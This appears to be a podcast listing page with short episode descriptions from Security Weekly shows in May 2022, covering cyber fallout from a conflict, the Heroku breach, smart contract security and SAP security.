    Land, sea, air, space, and–increasingly–cyber. These are the five domains where war is conducted. In March 2022, CISA and other international cyber agencies issued guidance urging private and public organizations alike to harden their security postures in preparation for cyber fallout. However, to date, the cyber fallout from the conflict has been minor, leaving some questioning the seriousness of the threat. ExtraHop VP of Sales Engineering, Mike Ernst, joins Business Security Weekly for a candid discussion about expected impact on private enterprises, and how business leaders and CISO can use this moment to scrutinize their security posture.   This segment is sponsored by ExtraHop Networks. Visit https://securityweekly.com/extrahop to learn more about them!   Visit https://www.securityweekly.com/bsw for all the latest episodes! Show Notes: https://securityweekly.com/bsw262

    Smart Contract Security, Heroku Breach, & Real World Crypto Highlights - ASW #196

    Play Episode Listen Later May 10, 2022 36:46

    In the AppSec News Mike and John discuss: Secure coding practices and smart contracts, lessons from the Heroku breach, Real World Crypto conference highlights, and an entertaining bug in Google Docs, & more!   Visit https://www.securityweekly.com/asw for all the latest episodes! Show Notes: https://securityweekly.com/asw196

    Securing SAP: Addressing the Critical & Complex Challenge - Christoph Nagy - ASW #196

    Play Episode Listen Later May 9, 2022 36:40

    With 77 percent of all financial transactions touching an SAP system, SAP is the backbone and heart of most organizations. Add to this the vast amounts of customer facing personal data used within SAP, and you can see why SAP security is critical. However, SAP's complexity - in the form of extensive customization, thousands of configurations, and typical misunderstandings about who and which group is responsible – make SAP security a challenge. Hear SecurityBridge CEO Christoph Nagy discuss with Security Weekly how organizations can navigate and address these challenges by taking critical steps such as patching, creating baselines, and developing roadmaps for risk prioritization and more to become SAP security heroes.   Visit https://www.securityweekly.com/asw for all the latest episodes! Show Notes: https://securityweekly.com/asw196

    Claim Paul's Security Weekly TV

    In order to claim this podcast we'll send an email to with a verification link. Simply click the link and you will be able to edit tags, request a refresh, and other features to take control of your podcast page!

    Claim Cancel